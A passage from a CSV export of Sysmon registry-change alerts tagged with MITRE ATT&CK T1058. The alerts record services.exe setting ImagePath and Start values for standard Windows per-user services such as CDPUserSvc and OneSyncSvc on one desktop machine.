13:10:50.683"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.683 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:10:56.204",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.719882000Z"",""eventRecordID"":""3355"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.683\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_69cbe\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.683"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.683 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_69cbe\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 13:10:56.151",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.717507500Z"",""eventRecordID"":""3354"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.683\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.683"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.683 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:10:56.091",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.717109000Z"",""eventRecordID"":""3353"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.683\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.683"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.683 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:56.014",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.715538200Z"",""eventRecordID"":""3352"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.683\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.683"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.683 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 13:10:55.969",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.714832400Z"",""eventRecordID"":""3351"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.683\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.683"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.683 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:55.926",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.711747300Z"",""eventRecordID"":""3350"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.683\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.683"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.683 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 13:10:55.865",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.711518200Z"",""eventRecordID"":""3349"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.683\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.683"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.683 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:55.751",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.710126100Z"",""eventRecordID"":""3348"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.667\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.667"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.667 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow -p""" +"Apr 24, 2020 @ 13:10:55.655",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.709773600Z"",""eventRecordID"":""3347"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.667\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.667"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.667 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:55.577",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.707978400Z"",""eventRecordID"":""3346"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.667\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\CredentialEnrollmentManager.exe\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.667"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\CredentialEnrollmentManager.exe""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.667 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_69cbe\ImagePath +Details: C:\Windows\system32\CredentialEnrollmentManager.exe""" +"Apr 24, 2020 @ 13:10:55.515",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.705520500Z"",""eventRecordID"":""3345"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.667\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.667"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.667 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:55.385",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.704186900Z"",""eventRecordID"":""3344"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.667\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.667"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.667 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 13:10:54.704",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.703831900Z"",""eventRecordID"":""3343"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.667\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.667"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.667 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:54.546",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.701850300Z"",""eventRecordID"":""3342"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.667\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.667"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.667 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:10:54.426",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.694538400Z"",""eventRecordID"":""3341"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.667\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_69cbe\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.667"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.667 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_69cbe\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 13:10:54.387",9,"ATT&CK T1058:Registry edit for new 
